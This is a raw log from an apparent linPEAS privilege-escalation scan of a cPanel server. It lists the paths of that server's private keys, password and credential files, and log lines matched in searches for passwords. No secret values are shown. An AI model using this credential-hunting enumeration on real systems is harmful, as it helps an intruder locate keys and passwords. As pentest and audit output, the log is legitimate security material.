TextWrapper(self.root) /usr/local/src/Python-3.7.0/Lib/idlelib/idle_test/test_history.py: @classmethod /usr/local/src/Python-3.7.0/Lib/idlelib/idle_test/test_history.py: cls.root.destroy() /usr/local/src/Python-3.7.0/Lib/idlelib/idle_test/test_history.py: del cls.root /usr/share/mysql-test/suite/perfschema/r/ddl_events_stages_history.result:ERROR 42000: Access denied for user 'root'@'localhost' to database 'performance_schema' /usr/share/mysql-test/suite/perfschema/r/ddl_events_stages_history.result:ERROR 42000: Access denied for user 'root'@'localhost' to database 'performance_schema' /usr/share/mysql-test/suite/perfschema/r/ddl_events_stages_history.result:ERROR 42000: Access denied for user 'root'@'localhost' to database 'performance_schema' /usr/share/mysql-test/suite/perfschema/r/ddl_events_stages_history_long.result:ERROR 42000: Access denied for user 'root'@'localhost' to database 'performance_schema' /usr/share/mysql-test/suite/perfschema/r/ddl_events_stages_history_long.result:ERROR 42000: Access denied for user 'root'@'localhost' to database 'performance_schema' /usr/share/mysql-test/suite/perfschema/r/ddl_events_stages_history_long.result:ERROR 42000: Access denied for user 'root'@'localhost' to database 'performance_schema' /usr/share/mysql-test/suite/perfschema/r/ddl_events_statements_history.result:ERROR 42000: Access denied for user 'root'@'localhost' to database 'performance_schema' /usr/share/mysql-test/suite/perfschema/r/ddl_events_statements_history.result:ERROR 42000: Access denied for user 'root'@'localhost' to database 'performance_schema' /usr/share/mysql-test/suite/perfschema/r/ddl_events_statements_history.result:ERROR 42000: Access denied for user 'root'@'localhost' to database 'performance_schema' /usr/share/mysql-test/suite/perfschema/r/ddl_events_statements_history_long.result:ERROR 42000: Access denied for user 'root'@'localhost' to database 'performance_schema' /usr/share/mysql-test/suite/perfschema/r/ddl_events_statements_history_long.result:ERROR 42000: Access denied for user 'root'@'localhost' to database 'performance_schema' /usr/share/mysql-test/suite/perfschema/r/ddl_events_statements_history_long.result:ERROR 42000: Access denied for user 'root'@'localhost' to database 'performance_schema' /usr/share/mysql-test/suite/perfschema/r/ddl_events_waits_history.result:ERROR 42000: Access denied for user 'root'@'localhost' to database 'performance_schema' /usr/share/mysql-test/suite/perfschema/r/ddl_events_waits_history.result:ERROR 42000: Access denied for user 'root'@'localhost' to database 'performance_schema' /usr/share/mysql-test/suite/perfschema/r/ddl_events_waits_history.result:ERROR 42000: Access denied for user 'root'@'localhost' to database 'performance_schema' /usr/share/mysql-test/suite/perfschema/r/ddl_events_waits_history_long.result:ERROR 42000: Access denied for user 'root'@'localhost' to database 'performance_schema' /usr/share/mysql-test/suite/perfschema/r/ddl_events_waits_history_long.result:ERROR 42000: Access denied for user 'root'@'localhost' to database 'performance_schema' /usr/share/mysql-test/suite/perfschema/r/ddl_events_waits_history_long.result:ERROR 42000: Access denied for user 'root'@'localhost' to database 'performance_schema' /usr/share/mysql-test/suite/perfschema/r/dml_events_stages_history.result:ERROR 42000: INSERT command denied to user 'root'@'localhost' for table 'events_stages_history' /usr/share/mysql-test/suite/perfschema/r/dml_events_stages_history.result:ERROR 42000: UPDATE command denied to user 'root'@'localhost' for table 'events_stages_history' /usr/share/mysql-test/suite/perfschema/r/dml_events_stages_history.result:ERROR 42000: UPDATE command denied to user 'root'@'localhost' for table 'events_stages_history' /usr/share/mysql-test/suite/perfschema/r/dml_events_stages_history.result:ERROR 42000: DELETE command denied to user 'root'@'localhost' for table 'events_stages_history' /usr/share/mysql-test/suite/perfschema/r/dml_events_stages_history.result:ERROR 42000: DELETE command denied to user 'root'@'localhost' for table 'events_stages_history' /usr/share/mysql-test/suite/perfschema/r/dml_events_stages_history.result:ERROR 42000: SELECT, LOCK TABLES command denied to user 'root'@'localhost' for table 'events_stages_history' /usr/share/mysql-test/suite/perfschema/r/dml_events_stages_history.result:ERROR 42000: SELECT, LOCK TABLES command denied to user 'root'@'localhost' for table 'events_stages_history' /usr/share/mysql-test/suite/perfschema/r/dml_events_stages_history_long.result:ERROR 42000: INSERT command denied to user 'root'@'localhost' for table 'events_stages_history_long' /usr/share/mysql-test/suite/perfschema/r/dml_events_stages_history_long.result:ERROR 42000: UPDATE command denied to user 'root'@'localhost' for table 'events_stages_history_long' /usr/share/mysql-test/suite/perfschema/r/dml_events_stages_history_long.result:ERROR 42000: UPDATE command denied to user 'root'@'localhost' for table 'events_stages_history_long' /usr/share/mysql-test/suite/perfschema/r/dml_events_stages_history_long.result:ERROR 42000: DELETE command denied to user 'root'@'localhost' for table 'events_stages_history_long' /usr/share/mysql-test/suite/perfschema/r/dml_events_stages_history_long.result:ERROR 42000: DELETE command denied to user 'root'@'localhost' for table 'events_stages_history_long' /usr/share/mysql-test/suite/perfschema/r/dml_events_stages_history_long.result:ERROR 42000: SELECT, LOCK TABLES command denied to user 'root'@'localhost' for table 'events_stages_history_long' /usr/share/mysql-test/suite/perfschema/r/dml_events_stages_history_long.result:ERROR 42000: SELECT, LOCK TABLES command denied to user 'root'@'localhost' for table 'events_stages_history_long' /usr/share/mysql-test/suite/perfschema/r/dml_events_statements_history.result:ERROR 42000: INSERT command denied to user 'root'@'localhost' for table 'events_statements_history' /usr/share/mysql-test/suite/perfschema/r/dml_events_statements_history.result:ERROR 42000: UPDATE command denied to user 'root'@'localhost' for table 'events_statements_history' /usr/share/mysql-test/suite/perfschema/r/dml_events_statements_history.result:ERROR 42000: UPDATE command denied to user 'root'@'localhost' for table 'events_statements_history' /usr/share/mysql-test/suite/perfschema/r/dml_events_statements_history.result:ERROR 42000: DELETE command denied to user 'root'@'localhost' for table 'events_statements_history' /usr/share/mysql-test/suite/perfschema/r/dml_events_statements_history.result:ERROR 42000: DELETE command denied to user 'root'@'localhost' for table 'events_statements_history' /usr/share/mysql-test/suite/perfschema/r/dml_events_statements_history.result:ERROR 42000: SELECT, LOCK TABLES command denied to user 'root'@'localhost' for table 'events_statements_history' /usr/share/mysql-test/suite/perfschema/r/dml_events_statements_history.result:ERROR 42000: SELECT, LOCK TABLES command denied to user 'root'@'localhost' for table 'events_statements_history' /usr/share/mysql-test/suite/perfschema/r/dml_events_statements_history_long.result:ERROR 42000: INSERT command denied to user 'root'@'localhost' for table 'events_statements_history_long' /usr/share/mysql-test/suite/perfschema/r/dml_events_statements_history_long.result:ERROR 42000: UPDATE command denied to user 'root'@'localhost' for table 'events_statements_history_long' /usr/share/mysql-test/suite/perfschema/r/dml_events_statements_history_long.result:ERROR 42000: UPDATE command denied to user 'root'@'localhost' for table 'events_statements_history_long' /usr/share/mysql-test/suite/perfschema/r/dml_events_statements_history_long.result:ERROR 42000: DELETE command denied to user 'root'@'localhost' for table 'events_statements_history_long' /usr/share/mysql-test/suite/perfschema/r/dml_events_statements_history_long.result:ERROR 42000: DELETE command denied to user 'root'@'localhost' for table 'events_statements_history_long' /usr/share/mysql-test/suite/perfschema/r/dml_events_statements_history_long.result:ERROR 42000: SELECT, LOCK TABLES command denied to user 'root'@'localhost' for table 'events_statements_history_long' /usr/share/mysql-test/suite/perfschema/r/dml_events_statements_history_long.result:ERROR 42000: SELECT, LOCK TABLES command denied to user 'root'@'localhost' for table 'events_statements_history_long' /usr/share/mysql-test/suite/perfschema/r/dml_events_waits_history.result:ERROR 42000: INSERT command denied to user 'root'@'localhost' for table 'events_waits_history' /usr/share/mysql-test/suite/perfschema/r/dml_events_waits_history.result:ERROR 42000: UPDATE command denied to user 'root'@'localhost' for table 'events_waits_history' /usr/share/mysql-test/suite/perfschema/r/dml_events_waits_history.result:ERROR 42000: UPDATE command denied to user 'root'@'localhost' for table 'events_waits_history' /usr/share/mysql-test/suite/perfschema/r/dml_events_waits_history.result:ERROR 42000: DELETE command denied to user 'root'@'localhost' for table 'events_waits_history' /usr/share/mysql-test/suite/perfschema/r/dml_events_waits_history.result:ERROR 42000: DELETE command denied to user 'root'@'localhost' for table 'events_waits_history' /usr/share/mysql-test/suite/perfschema/r/dml_events_waits_history.result:ERROR 42000: SELECT, LOCK TABLES command denied to user 'root'@'localhost' for table 'events_waits_history' /usr/share/mysql-test/suite/perfschema/r/dml_events_waits_history.result:ERROR 42000: SELECT, LOCK TABLES command denied to user 'root'@'localhost' for table 'events_waits_history' /usr/share/mysql-test/suite/perfschema/r/dml_events_waits_history_long.result:ERROR 42000: INSERT command denied to user 'root'@'localhost' for table 'events_waits_history_long' /usr/share/mysql-test/suite/perfschema/r/dml_events_waits_history_long.result:ERROR 42000: UPDATE command denied to user 'root'@'localhost' for table 'events_waits_history_long' /usr/share/mysql-test/suite/perfschema/r/dml_events_waits_history_long.result:ERROR 42000: UPDATE command denied to user 'root'@'localhost' for table 'events_waits_history_long' /usr/share/mysql-test/suite/perfschema/r/dml_events_waits_history_long.result:ERROR 42000: DELETE command denied to user 'root'@'localhost' for table 'events_waits_history_long' /usr/share/mysql-test/suite/perfschema/r/dml_events_waits_history_long.result:ERROR 42000: DELETE command denied to user 'root'@'localhost' for table 'events_waits_history_long' /usr/share/mysql-test/suite/perfschema/r/dml_events_waits_history_long.result:ERROR 42000: SELECT, LOCK TABLES command denied to user 'root'@'localhost' for table 'events_waits_history_long' /usr/share/mysql-test/suite/perfschema/r/dml_events_waits_history_long.result:ERROR 42000: SELECT, LOCK TABLES command denied to user 'root'@'localhost' for table 'events_waits_history_long' /usr/share/mysql-test/suite/perfschema/r/start_server_no_stages_history.result:mysql /usr/share/mysql-test/suite/perfschema/r/start_server_no_stages_history_long.result:mysql /usr/share/mysql-test/suite/perfschema/r/start_server_no_statements_history.result:mysql /usr/share/mysql-test/suite/perfschema/r/start_server_no_statements_history_long.result:mysql /usr/share/mysql-test/suite/perfschema/r/start_server_no_waits_history.result:mysql /usr/share/mysql-test/suite/perfschema/r/start_server_no_waits_history_long.result:mysql /usr/share/zsh/5.0.2/functions/_history:SUFFIX="$SUFFIX$ISUFFIX" /usr/share/zsh/5.0.2/functions/_history_complete_word:_history_complete_word "$@" /usr/share/zsh/5.0.2/functions/_history_modifiers: "r:root - strip suffix" ╔══════════╣ Searching passwords in config PHP files  ╔══════════╣ Searching *password* or *credential* files in home (limit 70) /etc/apache2/conf.d/ssl.key /etc/apache2/conf.d/ssl.key/server.key /etc/dovecot/ssl/dovecot.key /etc/exim.key /etc/named.iscdlv.key /etc/named.root.key /etc/openldap/certs/password /etc/pam.d/password-auth /etc/pam.d/password-auth-ac /etc/pki/tls/private/localhost.key /etc/rndc.key /etc/ssl/private/ns1.aarms.com.key /etc/ssl/private/ns1.miisky.com.key /etc/trusted-key.key /opt/cpanel/ea-openssl/etc/pki/tls/man/man3/des_read_2passwords.3 /opt/cpanel/ea-openssl/etc/pki/tls/man/man3/des_read_password.3 /opt/cpanel/ea-php55/root/usr/include/php/ext/standard/php_password.h /opt/cpanel/ea-php56/root/usr/include/php/ext/standard/php_password.h /opt/cpanel/ea-php70/root/usr/include/php/ext/standard/php_password.h /usr/bin/systemd-ask-password /usr/bin/systemd-tty-ask-password-agent /usr/include/mysql/mysql/get_password.h /usr/include/mysql/mysql/plugin_validate_password.h /usr/include/mysql/plugin_validate_password.h /usr/lib/grub/i386-pc/legacy_password_test.mod /usr/lib/grub/i386-pc/password.mod /usr/lib/grub/i386-pc/password_pbkdf2.mod /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.222.b10-0.el7_6.x86_64/jre/lib/management/jmxremote.password.template /usr/lib/systemd/system/multi-user.target.wants/systemd-ask-password-wall.path /usr/lib/systemd/system/sysinit.target.wants/systemd-ask-password-console.path /usr/lib/systemd/system/systemd-ask-password-console.path /usr/lib/systemd/system/systemd-ask-password-console.service /usr/lib/systemd/system/systemd-ask-password-plymouth.path /usr/lib/systemd/system/systemd-ask-password-plymouth.service #)There are more creds/passwds files in the previous parent folder /usr/lib64/mysql/plugin/debug/validate_password.so /usr/lib64/mysql/plugin/validate_password.so /usr/lib64/pppd/2.4.5/passwordfd.so /usr/libexec/dovecot/checkpassword-reply /usr/libexec/git-core/git-credential /usr/libexec/git-core/git-credential-cache /usr/libexec/git-core/git-credential-cache--daemon /usr/libexec/git-core/git-credential-store #)There are more creds/passwds files in the previous parent folder /usr/local/src/csf/ui/server.key /usr/sbin/grub2-setpassword /usr/share/augeas/lenses/dist/jmxpassword.aug /usr/share/doc/git-1.8.3.1/contrib/credential /usr/share/doc/git-1.8.3.1/contrib/credential/gnome-keyring/git-credential-gnome-keyring.c /usr/share/doc/git-1.8.3.1/contrib/credential/netrc/git-credential-netrc /usr/share/doc/git-1.8.3.1/contrib/credential/osxkeychain/git-credential-osxkeychain.c /usr/share/doc/git-1.8.3.1/contrib/credential/wincred/git-credential-wincred.c /usr/share/doc/git-1.8.3.1/git-credential-cache--daemon.html /usr/share/doc/git-1.8.3.1/git-credential-cache--daemon.txt /usr/share/doc/git-1.8.3.1/git-credential-cache.html /usr/share/doc/git-1.8.3.1/git-credential-cache.txt #)There are more creds/passwds files in the previous parent folder /usr/share/doc/git-1.8.3.1/technical/api-credentials.txt /usr/share/doc/libmcrypt-devel-2.5.8/README.key /usr/share/doc/lynx-2.8.8/docs/djgpp.key /usr/share/doc/lynx-2.8.8/docs/pdcurses.key /usr/share/doc/lynx-2.8.8/docs/slang.key ╔══════════╣ Checking for TTY (sudo/su) passwords in audit logs  ╔══════════╣ Checking for TTY (sudo/su) passwords in audit logs  ╔══════════╣ Searching passwords inside logs (limit 70) /var/log/boot.log-20250517:[ OK ] Started Forward Password Requests to Plymouth Directory Watch. /var/log/boot.log-20250517:[ OK ] Started Forward Password Requests to Wall Directory Watch. /var/log/boot.log-20250518:[ OK ] Started Forward Password Requests to Plymouth Directory Watch. /var/log/boot.log-20250518:[ OK ] Started Forward Password Requests to Wall Directory Watch. /var/log/boot.log-20250519:[ OK ] Started Forward Password Requests to Plymouth Directory Watch. /var/log/boot.log-20250519:[ OK ] Started Forward Password Requests to Wall Directory Watch. /var/log/boot.log-20250520:[ OK ] Started Forward Password Requests to Plymouth Directory Watch. /var/log/boot.log-20250520:[ OK ] Started Forward Password Requests to Wall Directory Watch. /var/log/boot.log-20250521:[ OK ] Started Forward Password Requests to Plymouth Directory Watch. /var/log/boot.log-20250521:[ OK ] Started Forward Password Requests to Wall Directory Watch. /var/log/boot.log-20250522:[ OK ] Started Forward Password Requests to Plymouth Directory Watch. /var/log/boot.log-20250522:[ OK ] Started Forward Password Requests to Wall Directory Watch. /var/log/boot.log-20250523:[ OK ] Started Forward Password Requests to Plymouth Directory Watch. /var/log/boot.log-20250523:[ OK ] Started Forward Password Requests to Wall Directory Watch. /var/log/cpanel-install.log:2017-08-07 19:35:53 889 (DEBUG): Removing suid from /usr/sbin/unix_chkpwd /var/log/cpanel-install.log:2017-08-07 19:35:53 889 (DEBUG): Skipping suid removal for /usr/bin/gpasswd /var/log/cpanel-install.log:2017-08-07 19:35:53 889 (DEBUG): Skipping suid removal for /usr/bin/passwd /var/log/cpanel-install.log:2017-08-07 19:42:20 219 (DEBUG): *** Done unify_virtual_user_password_strengths *** /var/log/cpanel-install.log:2017-08-07 19:42:20 219 (DEBUG): *** Running unify_virtual_user_password_strengths *** /var/log/cpanel-install.log:2017-08-07 19:42:20 219 (DEBUG): Completed Task: β€œ11.54.0.0_password_strength_settings”. /var/log/cpanel-install.log:2017-08-07 19:42:20 219 (DEBUG): FTP password files updated. /var/log/cpanel-install.log:2017-08-07 19:42:20 219 (DEBUG): FTP vhost passwords synced /var/log/cpanel-install.log:2017-08-07 19:42:20 219 (DEBUG): Running Task: β€œ11.54.0.0_password_strength_settings”. /var/log/cpanel-install.log:2017-08-07 19:42:20 219 (DEBUG): Updating FTP passwords for all users /var/log/cpanel-install.log:2017-08-07 19:48:43 219 (DEBUG): [2017-08-07 19:48:43 +0530] [28243] Locking password for user ctrl4c. /var/log/cpanel-install.log:2017-08-07 19:48:43 219 (DEBUG): [2017-08-07 19:48:43 +0530] [28243] passwd: Success /var/log/cpanel-install.log:2017-08-07 19:59:11 1138 ( INFO): 4. Enter your root password in the Password text box /var/log/cpanel-install.log:[2017-08-07 19:05:00 +0530] Set permissions on /usr/local/cpanel/base/backend/passwordstrength.cgi-cpanelsync to 0755 /var/log/cpanel-install.log:[2017-08-07 19:16:08 +0530] Set permissions on /usr/local/cpanel/bin/jail_safe_passwd-cpanelsync to 0755 /var/log/cpanel-install.log:[2017-08-07 19:26:55 +0530] cpanel-perl-524-Crypt-Passwd-XS-0.601-1.cp1162.x86_64 /var/log/cpanel-install.log:[2017-08-07 19:29:51 +0530] /usr/bin/mysqladmin -u root -h ns1.aarms.com password 'new-password' /var/log/cpanel-install.log:[2017-08-07 19:29:51 +0530] /usr/bin/mysqladmin -u root password 'new-password' /var/log/cpanel-install.log:[2017-08-07 19:29:51 +0530] PLEASE REMEMBER TO SET A PASSWORD FOR THE MySQL root USER ! /var/log/elevate-cpanel.log:* 01-22:27:51 (3777) [INFO] passwd.x86_64 0.79-6.el7 base  /var/log/elevate-cpanel.log:* 01-22:28:18 (3777) [INFO] passwd.x86_64 0.79-6.el7 base  /var/log/elevate-cpanel.log:* 01-22:28:43 (3777) [INFO] passwd.x86_64 0.79-6.el7 base  /var/log/elevate-cpanel.log:* 01-22:29:03 (3777) [INFO] passwd.x86_64 0.79-6.el7 base  /var/log/elevate-cpanel.log:* 01-22:30:40 (3372) [INFO] passwd.x86_64 0.79-6.el7 base  /var/log/elevate-cpanel.log:* 02-22:27:59 (3777) [INFO] passwd.x86_64 0.79-6.el7 base  /var/log/elevate-cpanel.log:* 02-22:28:29 (3777) [INFO] passwd.x86_64 0.79-6.el7 base  /var/log/elevate-cpanel.log:* 02-22:28:32 (3777) [INFO] passwd.x86_64 0.79-6.el7 base  /var/log/elevate-cpanel.log:* 02-22:30:20 (3372) [INFO] passwd.x86_64 0.79-6.el7 base  /var/log/elevate-cpanel.log:* 02-22:31:21 (3777) [INFO] passwd.x86_64 0.79-6.el7 base  /var/log/elevate-cpanel.log:* 03-22:27:58 (3777) [INFO] passwd.x86_64 0.79-6.el7 base  /var/log/elevate-cpanel.log:* 03-22:28:03 (3777) [INFO] passwd.x86_64 0.79-6.el7 base  /var/log/elevate-cpanel.log:* 03-22:28:07 (3372) [INFO] passwd.x86_64 0.79-6.el7 base  /var/log/elevate-cpanel.log:* 03-22:28:32 (3777) [INFO] passwd.x86_64 0.79-6.el7 base  /var/log/elevate-cpanel.log:* 03-22:30:25 (3777) [INFO] passwd.x86_64 0.79-6.el7 base  /var/log/elevate-cpanel.log:* 04-22:27:58 (3777) [INFO] passwd.x86_64 0.79-6.el7 base  /var/log/elevate-cpanel.log:* 04-22:28:13 (3372) [INFO] passwd.x86_64 0.79-6.el7 base  /var/log/elevate-cpanel.log:* 04-22:28:56 (3777) [INFO] passwd.x86_64 0.79-6.el7 base  /var/log/elevate-cpanel.log:* 04-22:29:29 (3777) [INFO] passwd.x86_64 0.79-6.el7 base  /var/log/elevate-cpanel.log:* 04-22:30:17 (3777) [INFO] passwd.x86_64 0.79-6.el7 base  /var/log/elevate-cpanel.log:* 05-22:27:59 (3777) [INFO] passwd.x86_64 0.79-6.el7 base  /var/log/elevate-cpanel.log:* 05-22:28:03 (3777) [INFO] passwd.x86_64 0.79-6.el7 base  /var/log/elevate-cpanel.log:* 05-22:29:02 (3372) [INFO] passwd.x86_64 0.79-6.el7 base  /var/log/elevate-cpanel.log:* 05-22:29:23 (3777) [INFO] passwd.x86_64 0.79-6.el7 base  /var/log/elevate-cpanel.log:* 05-22:32:18 (3777) [INFO] passwd.x86_64 0.79-6.el7 base  /var/log/elevate-cpanel.log:* 06-22:28:09 (3777) [INFO] passwd.x86_64 0.79-6.el7 base  /var/log/elevate-cpanel.log:* 06-22:28:11 (3372) [INFO] passwd.x86_64 0.79-6.el7 base  /var/log/elevate-cpanel.log:* 06-22:28:14 (3777) [INFO] passwd.x86_64 0.79-6.el7 base  /var/log/elevate-cpanel.log:* 06-22:28:24 (3777) [INFO] passwd.x86_64 0.79-6.el7 base  /var/log/elevate-cpanel.log:* 06-22:31:48 (3777) [INFO] passwd.x86_64 0.79-6.el7 base  /var/log/elevate-cpanel.log:* 07-22:28:14 (3777) [INFO] passwd.x86_64 0.79-6.el7 base  /var/log/elevate-cpanel.log:* 07-22:28:35 (3777) [INFO] passwd.x86_64 0.79-6.el7 base  /var/log/elevate-cpanel.log:* 07-22:28:44 (3777) [INFO] passwd.x86_64 0.79-6.el7 base  /var/log/elevate-cpanel.log:* 07-22:28:56 (3372) [INFO] passwd.x86_64 0.79-6.el7 base  /var/log/elevate-cpanel.log:* 07-22:34:43 (3777) [INFO] passwd.x86_64 0.79-6.el7 base  /var/log/elevate-cpanel.log:* 08-22:28:28 (3777) [INFO] passwd.x86_64 0.79-6.el7 base  /var/log/elevate-cpanel.log:* 08-22:28:31 (3777) [INFO] passwd.x86_64 0.79-6.el7 base   ╔════════════════╗ ════════════════════════════════╣ API Keys Regex ╠════════════════════════════════  β•šβ•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β• Regexes to search for API keys aren't activated, use param '-r'